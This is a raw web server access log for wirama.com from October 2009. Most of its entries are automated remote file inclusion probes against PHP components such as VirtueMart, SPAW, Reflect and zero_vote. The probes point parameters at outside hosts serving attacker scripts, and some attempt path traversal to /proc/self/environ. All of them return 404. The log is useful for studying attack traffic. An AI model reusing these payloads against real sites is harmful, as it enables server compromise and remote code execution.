222.236.47.23 - - [04/Oct/2009:13:03:33 -0700] "GET /logs/access_090801.log//export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:33 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:33 -0700] "GET /export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.237.151.144 - - [04/Oct/2009:13:03:35 -0700] "GET /logs/access_090731.log HTTP/1.0" 206 3014656 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:03:43 -0700] "GET /logs/access_090901.log HTTP/1.0" 206 3276800 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.54 - - [04/Oct/2009:13:03:44 -0700] "GET /logs/access_090901.log HTTP/1.0" 200 3407872 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:03:46 -0700] "GET /logs/access_090901.log HTTP/1.0" 206 3276800 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
211.189.18.73 - - [04/Oct/2009:13:08:31 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:08:31 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:08:31 -0700] "GET /logs/access_090801.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:09:08 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:09:08 -0700] "GET /logs/access_090801.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:09:13 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:10:26 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:10:30 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
65.55.207.48 - - [04/Oct/2009:13:13:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.48 - - [04/Oct/2009:13:16:19 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.47 - - [04/Oct/2009:13:24:25 -0700] "GET /?S=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.78.215 - - [04/Oct/2009:13:27:20 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:07 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:07 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:07 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:08 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:08 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:08 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:13:30:14 -0700] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.219.245.149 - - [04/Oct/2009:13:30:14 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.219.245.149 - - [04/Oct/2009:13:30:14 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.219.245.149 - - [04/Oct/2009:13:30:16 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.219.245.149 - - [04/Oct/2009:13:30:17 -0700] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.219.245.149 - - [04/Oct/2009:13:30:17 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.106.228 - - [04/Oct/2009:13:30:18 -0700] "GET /?D=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:30:45 -0700] "GET /logs/access_090601.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:31:01 -0700] "GET /logs/access_090601.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [04/Oct/2009:13:31:19 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [04/Oct/2009:13:31:19 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [04/Oct/2009:13:31:40 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [04/Oct/2009:13:32:51 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.100.181.217 - - [04/Oct/2009:13:32:51 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.100.181.217 - - [04/Oct/2009:13:32:51 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.251.186.141 - - [04/Oct/2009:13:37:38 -0700] "GET /logs/access_090331.log/errors.php?error=http://joaopiri.justfree.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.251.186.141 - - [04/Oct/2009:13:37:38 -0700] "GET /errors.php?error=http://joaopiri.justfree.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.251.186.141 - - [04/Oct/2009:13:37:38 -0700] "GET /logs/errors.php?error=http://joaopiri.justfree.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.251.186.141 - - [04/Oct/2009:13:37:58 -0700] "GET /logs/access_090601.log/errors.php?error=http://joaopiri.justfree.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.137.160.36 - - [04/Oct/2009:13:38:18 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.36 - - [04/Oct/2009:13:38:18 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.36 - - [04/Oct/2009:13:38:18 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.36 - - [04/Oct/2009:13:39:03 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.137.160.36 - - [04/Oct/2009:13:39:03 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.137.160.36 - - [04/Oct/2009:13:39:03 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:50:27 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:13:50:27 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:59:36 -0700] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:59:36 -0700] "GET /logs/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:59:36 -0700] "GET /snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.225.12 - - [04/Oct/2009:14:02:00 -0700] "GET /logs/access_090801.log//reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.225.12 - - [04/Oct/2009:14:02:00 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.225.12 - - [04/Oct/2009:14:02:00 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:02:40 -0700] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:02:40 -0700] "GET /logs/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:02:40 -0700] "GET /snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:02:41 -0700] "GET /logs/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:02:41 -0700] "GET /snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:02:41 -0700] "GET /logs/access_090801.log/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:03:19 -0700] "GET /logs/access_090601.log/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:03:47 -0700] "GET /logs/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:03:47 -0700] "GET /logs/access_090331.log/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:03:47 -0700] "GET /skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.94.66 - - [04/Oct/2009:14:04:30 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.94.66 - - [04/Oct/2009:14:04:30 -0700] "GET /logs/access_090801.log//reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.94.66 - - [04/Oct/2009:14:04:30 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:04:46 -0700] "GET /logs/access_090801.log/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:04:46 -0700] "GET /skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:04:46 -0700] "GET /logs/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:05:47 -0700] "GET /logs/access_090601.log/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.125.146.91 - - [04/Oct/2009:14:05:50 -0700] "GET /logs/access_090331.log/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.149.157.136 - - [04/Oct/2009:14:06:54 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
91.149.157.136 - - [04/Oct/2009:14:06:54 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:07:24 -0700] "GET /logs/access_090601.log/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:08:32 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:08:32 -0700] "GET /logs/access_090801.log//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:08:32 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.17.150.102 - - [04/Oct/2009:14:10:05 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
85.17.150.102 - - [04/Oct/2009:14:10:05 -0700] "GET /reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
62.2.194.146 - - [04/Oct/2009:14:10:30 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "wirama.com"
62.2.194.146 - - [04/Oct/2009:14:10:30 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "wirama.com"
85.17.150.102 - - [04/Oct/2009:14:10:40 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.gemsimport.com/cmdstate.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
85.17.150.102 - - [04/Oct/2009:14:10:41 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.gemsimport.com/cmdstate.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:11:15 -0700] "GET /logs/access_090601.log//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:11:52 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:11:52 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:11:52 -0700] "GET /logs/access_090801.log//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.17.150.102 - - [04/Oct/2009:14:13:00 -0700] "GET /logs/errors.php?error=http://www.gemsimport.com/cmdstate.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
85.17.150.102 - - [04/Oct/2009:14:13:00 -0700] "GET /errors.php?error=http://www.gemsimport.com/cmdstate.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:14:15 -0700] "GET /logs/access_090601.log//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:15:20 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:15:20 -0700] "GET /logs/access_090801.log//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:15:20 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.10.209.11 - - [04/Oct/2009:14:15:37 -0700] "GET /logs//reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/v8.id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.10.209.11 - - [04/Oct/2009:14:15:38 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/v8.id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
65.55.106.211 - - [04/Oct/2009:14:15:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
222.236.47.23 - - [04/Oct/2009:14:17:42 -0700] "GET /logs/access_090601.log//reflect/snippet.reflect.php?reflect_base=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.19.49 - - [04/Oct/2009:14:20:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://akar.web.tr/administrator/components/com_virtuemart/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.19.49 - - [04/Oct/2009:14:20:22 -0700] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://akar.web.tr/administrator/components/com_virtuemart/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.19.49 - - [04/Oct/2009:14:20:22 -0700] "GET /logs/access_090601.log///modules/vwar/admin/admin.php?vwar_root=http://akar.web.tr/administrator/components/com_virtuemart/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.172.38.23 - - [04/Oct/2009:14:20:27 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://bluepadma.com/56.txt?cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.wirama.com"
65.55.106.211 - - [04/Oct/2009:14:25:23 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
75.126.94.66 - - [04/Oct/2009:14:25:36 -0700] "GET /logs/access_090601.log//reflect/snippet.reflect.php?reflect_base=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [04/Oct/2009:14:59:45 -0700] "GET /_private/ HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:22 -0700] "GET /skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:22 -0700] "GET /logs/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:22 -0700] "GET /logs/access_090801.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:26 -0700] "GET /skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:26 -0700] "GET /logs/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:26 -0700] "GET /logs/access_090801.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.155 - - [04/Oct/2009:15:13:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:37 -0700] "GET /skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:37 -0700] "GET /logs/access_090801.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:37 -0700] "GET /logs/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [04/Oct/2009:15:13:46 -0700] "GET /logs/access_090331.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
